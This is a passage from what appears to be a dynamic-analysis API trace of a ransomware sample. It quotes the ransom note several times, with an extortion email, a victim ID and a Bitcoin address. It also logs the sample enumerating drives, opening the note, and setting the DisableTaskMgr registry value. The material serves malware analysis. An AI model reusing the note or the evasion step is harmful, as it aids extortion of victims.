guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2498 [0124.549] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x242ff88, cbMultiByte=2498, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", lpUsedDefaultChar=0x0) returned 2498 [0124.549] WriteFile (in: hFile=0x414, lpBuffer=0x242ff88*, nNumberOfBytesToWrite=0x9c2, lpNumberOfBytesWritten=0x19fcac, lpOverlapped=0x0 | out: lpBuffer=0x242ff88*, lpNumberOfBytesWritten=0x19fcac*=0x9c2, lpOverlapped=0x0) returned 1 [0124.550] CloseHandle (hObject=0x414) returned 1 [0124.554] GetFileAttributesW (lpFileName="D:\\" (normalized: "d:")) returned 0xffffffff [0124.555] GetLastError () returned 0x3 [0124.559] GetFileAttributesW (lpFileName="E:\\" (normalized: "e:")) returned 0xffffffff [0124.559] GetLastError () returned 0x3 [0124.564] GetFileAttributesW (lpFileName="F:\\" (normalized: "f:")) returned 0xffffffff [0124.564] GetLastError () returned 0x3 [0124.568] GetFileAttributesW (lpFileName="G:\\" (normalized: "g:")) returned 0xffffffff [0124.568] GetLastError () returned 0x3 [0124.572] GetFileAttributesW (lpFileName="H:\\" (normalized: "h:")) returned 0xffffffff [0124.575] GetLastError () returned 0x3 [0124.580] GetFileAttributesW (lpFileName="I:\\" (normalized: "i:")) returned 0xffffffff [0124.580] GetLastError () returned 0x3 [0124.584] GetFileAttributesW (lpFileName="J:\\" (normalized: "j:")) returned 0xffffffff [0124.584] GetLastError () returned 0x3 [0124.588] GetFileAttributesW (lpFileName="K:\\" (normalized: "k:")) returned 0xffffffff [0124.589] GetLastError () returned 0x3 [0124.593] GetFileAttributesW (lpFileName="L:\\" (normalized: "l:")) returned 0xffffffff [0124.593] GetLastError () returned 0x3 [0124.597] GetFileAttributesW (lpFileName="M:\\" (normalized: "m:")) returned 0xffffffff [0124.597] GetLastError () returned 0x3 [0124.601] GetFileAttributesW (lpFileName="N:\\" (normalized: "n:")) returned 0xffffffff [0124.601] GetLastError () returned 0x3 [0124.608] GetFileAttributesW (lpFileName="O:\\" (normalized: "o:")) returned 0xffffffff [0124.608] GetLastError () returned 0x3 [0124.612] GetFileAttributesW (lpFileName="P:\\" (normalized: "p:")) returned 0xffffffff [0124.613] GetLastError () returned 0x3 [0124.617] GetFileAttributesW (lpFileName="Q:\\" (normalized: "q:")) returned 0xffffffff [0124.633] GetLastError () returned 0x3 [0124.638] GetFileAttributesW (lpFileName="R:\\" (normalized: "r:")) returned 0xffffffff [0124.638] GetLastError () returned 0x3 [0124.642] GetFileAttributesW (lpFileName="S:\\" (normalized: "s:")) returned 0xffffffff [0124.642] GetLastError () returned 0x3 [0124.647] GetFileAttributesW (lpFileName="T:\\" (normalized: "t:")) returned 0xffffffff [0124.647] GetLastError () returned 0x3 [0124.651] GetFileAttributesW (lpFileName="U:\\" (normalized: "u:")) returned 0xffffffff [0124.652] GetLastError () returned 0x3 [0124.656] GetFileAttributesW (lpFileName="V:\\" (normalized: "v:")) returned 0xffffffff [0124.656] GetLastError () returned 0x3 [0124.661] GetFileAttributesW (lpFileName="W:\\" (normalized: "w:")) returned 0xffffffff [0124.661] GetLastError () returned 0x3 [0124.665] GetFileAttributesW (lpFileName="X:\\" (normalized: "x:")) returned 0xffffffff [0124.789] GetLastError () returned 0x3 [0124.794] GetFileAttributesW (lpFileName="Y:\\" (normalized: "y:")) returned 0xffffffff [0124.794] GetLastError () returned 0x3 [0124.799] GetFileAttributesW (lpFileName="Z:\\" (normalized: "z:")) returned 0xffffffff [0124.799] GetLastError () returned 0x3 [0124.799] GetCurrentThreadId () returned 0x1358 [0124.799] GetCurrentThreadId () returned 0x1358 [0124.799] GetCurrentThreadId () returned 0x1358 [0124.799] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="C:\\How Do I Recover My Files (Readme).txt", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0132.128] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x19fd3c, lpdwDisposition=0x19fd38 | out: phkResult=0x19fd3c*=0x414, lpdwDisposition=0x19fd38*=0x2) returned 0x0 [0132.129] RegSetValueExW (in: hKey=0x414, lpValueName="DisableTaskMgr", Reserved=0x0, dwType=0x4, lpData=0x19fd44*=0x0, cbData=0x4 | out: lpData=0x19fd44*=0x0) returned 0x0 [0132.129] RegCloseKey (hKey=0x414) returned 0x0 [0132.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Digest", cchCount1=6, lpString2="Digest", cchCount2=6) returned 2 [0132.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTLM", cchCount1=4, lpString2="NTLM", cchCount2=4) returned 2 [0132.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Negotiate", cchCount1=9, lpString2="Negotiate", cchCount2=9) returned 2 [0132.130] FreeLibrary (hLibModule=0x46480000) returned 1 [0132.132] GetCurrentThreadId () returned 0x1358 [0132.132] GetCurrentThreadId () returned 0x1358 [0132.132] GetCurrentThreadId () returned 0x1358 [0132.132] GetCurrentThreadId () returned 0x1358 [0132.132] GetCurrentThreadId () returned 0x1358 [0132.132] GetCurrentThreadId () returned 0x1358 [0132.132] GetCurrentThreadId () returned 0x1358 [0132.132] GetCurrentThreadId () returned 0x1358 [0132.132] GetCurrentThreadId () returned 0x1358 [0132.133] GetCurrentThreadId () returned 0x1358 [0132.133] GetCurrentThreadId () returned 0x1358 [0132.133] GetCurrentThreadId () returned 0x1358 [0132.133] FreeLibrary (hLibModule=0x6f410000) returned 1 [0132.133] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSACleanup", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0132.133] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSACleanup", cchWideChar=10, lpMultiByteStr=0x247a84c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSACleanup", lpUsedDefaultChar=0x0) returned 10 [0132.133] GetProcAddress (hModule=0x754f0000, lpProcName="WSACleanup") returned 0x75507170 [0132.133] WSACleanup () returned 0 [0132.749] FreeLibrary (hLibModule=0x754f0000) returned 1 [0132.749] FreeLibrary (hLibModule=0x6f540000) returned 1 [0132.749] FreeLibrary (hLibModule=0x6e5c0000) returned 1 [0132.750] FreeLibrary (hLibModule=0x77900000) returned 1 [0132.751] GetCurrentThreadId () returned 0x1358 [0132.751] GetCurrentThreadId () returned 0x1358 [0132.751] GetCurrentThreadId () returned 0x1358 [0132.751] GetCurrentThreadId () returned 0x1358 [0132.751] GetCurrentThreadId () returned 0x1358 [0132.751] GetCurrentProcess () returned 0xffffffff [0132.751] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x19fcb0, dwLength=0x1c | out: lpBuffer=0x19fcb0*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0132.751] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x401000, lpBuffer=0x19fcb0, dwLength=0x1c | out: lpBuffer=0x19fcb0*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x19d000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0132.752] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x59e000, lpBuffer=0x19fcb0, dwLength=0x1c | out: lpBuffer=0x19fcb0*(BaseAddress=0x59e000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c [0132.752] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x59f000, lpBuffer=0x19fcb0, dwLength=0x1c | out: lpBuffer=0x19fcb0*(BaseAddress=0x59f000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x8, Type=0x1000000)) returned 0x1c [0132.752] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x5a0000, lpBuffer=0x19fcb0, dwLength=0x1c | out: lpBuffer=0x19fcb0*(BaseAddress=0x5a0000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c [0132.752] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x5a2000, lpBuffer=0x19fcb0, dwLength=0x1c | out: lpBuffer=0x19fcb0*(BaseAddress=0x5a2000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x8, Type=0x1000000)) returned 0x1c [0132.752] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x5a4000, lpBuffer=0x19fcb0, dwLength=0x1c | out: lpBuffer=0x19fcb0*(BaseAddress=0x5a4000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c [0132.752] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x5a6000, lpBuffer=0x19fcb0, dwLength=0x1c | out: lpBuffer=0x19fcb0*(BaseAddress=0x5a6000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x8, Type=0x1000000)) returned 0x1c [0132.752] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x5a7000, lpBuffer=0x19fcb0, dwLength=0x1c | out: lpBuffer=0x19fcb0*(BaseAddress=0x5a7000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c [0132.752] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x5ad000, lpBuffer=0x19fcb0, dwLength=0x1c | out: lpBuffer=0x19fcb0*(BaseAddress=0x5ad000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x8, Type=0x1000000)) returned 0x1c [0132.752] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x5ae000, lpBuffer=0x19fcb0, dwLength=0x1c | out: lpBuffer=0x19fcb0*(BaseAddress=0x5ae000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c [0132.752] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x5b1000, lpBuffer=0x19fcb0, dwLength=0x1c | out: lpBuffer=0x19fcb0*(BaseAddress=0x5b1000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x8, Type=0x1000000)) returned 0x1c [0132.752] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x5b2000, lpBuffer=0x19fcb0, dwLength=0x1c | out: lpBuffer=0x19fcb0*(BaseAddress=0x5b2000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c [0132.752] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x5b3000, lpBuffer=0x19fcb0, dwLength=0x1c | out: lpBuffer=0x19fcb0*(BaseAddress=0x5b3000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0132.752] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x5b4000, lpBuffer=0x19fcb0, dwLength=0x1c | out: lpBuffer=0x19fcb0*(BaseAddress=0x5b4000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c [0132.752] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x5b5000, lpBuffer=0x19fcb0, dwLength=0x1c | out: lpBuffer=0x19fcb0*(BaseAddress=0x5b5000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x33000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0132.752] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x5e8000, lpBuffer=0x19fcb0, dwLength=0x1c | out: lpBuffer=0x19fcb0*(BaseAddress=0x5e8000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x8000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0132.752] GetCurrentThreadId () returned 0x1358 [0132.752] GetCurrentThreadId () returned 0x1358 [0132.752] ResetEvent (hEvent=0x1ec) returned 1 [0132.752] GetCurrentThreadId () returned 0x1358 [0132.752] GetCurrentThreadId () returned 0x1358 [0132.752] GetCurrentThreadId () returned 0x1358 [0132.752] ResetEvent (hEvent=0x1ec) returned 1 [0132.753] GetCurrentThreadId () returned 0x1358 [0132.753] GetCurrentThreadId () returned 0x1358 [0132.753] GetCurrentThreadId () returned 0x1358 [0132.753] GetCurrentThreadId () returned 0x1358 [0132.753] GetCurrentThreadId () returned 0x1358 [0132.753] GetCurrentThreadId () returned 0x1358 [0132.753] GetCurrentThreadId () returned 0x1358 [0132.753] GetCurrentThreadId () returned 0x1358 [0132.753] GetCurrentThreadId () returned 0x1358 [0132.753] GetCurrentThreadId () returned 0x1358 [0132.753] GetCurrentThreadId () returned 0x1358 [0132.753] GetCurrentThreadId () returned 0x1358 [0132.753] GetCurrentThreadId () returned 0x1358 [0132.753] GetCurrentThreadId () returned 0x1358 [0132.753] GetCurrentThreadId () returned 0x1358 [0132.753] GetCurrentThreadId () returned 0x1358 [0132.753] CloseHandle (hObject=0x1ec) returned 1 [0132.753] CloseHandle (hObject=0x1f0) returned 1 [0132.753] CloseHandle (hObject=0x1e8) returned 1 [0132.753] GetCurrentThreadId () returned 0x1358 [0132.753] GetCurrentThreadId () returned 0x1358 [0132.753] GetCurrentThreadId () returned 0x1358 [0132.754] GetCurrentThreadId () returned 0x1358 [0132.754] GetCurrentThreadId () returned 0x1358 [0132.754] GetCurrentThreadId () returned 0x1358 [0132.754] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xac)) [0132.754] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xac)) [0132.754] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xac)) [0132.754] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xac)) [0132.754] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xac)) [0132.754] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xac)) [0132.754] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xac)) [0132.754] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.754] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.754] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.754] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.754] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.754] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.754] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.754] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.754] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.754] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1e, wMilliseconds=0xbb)) [0132.755] GetLocalTime (in: lpSystemTime=0x19fcf8 | out: lpSystemTime=0x19fcf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, 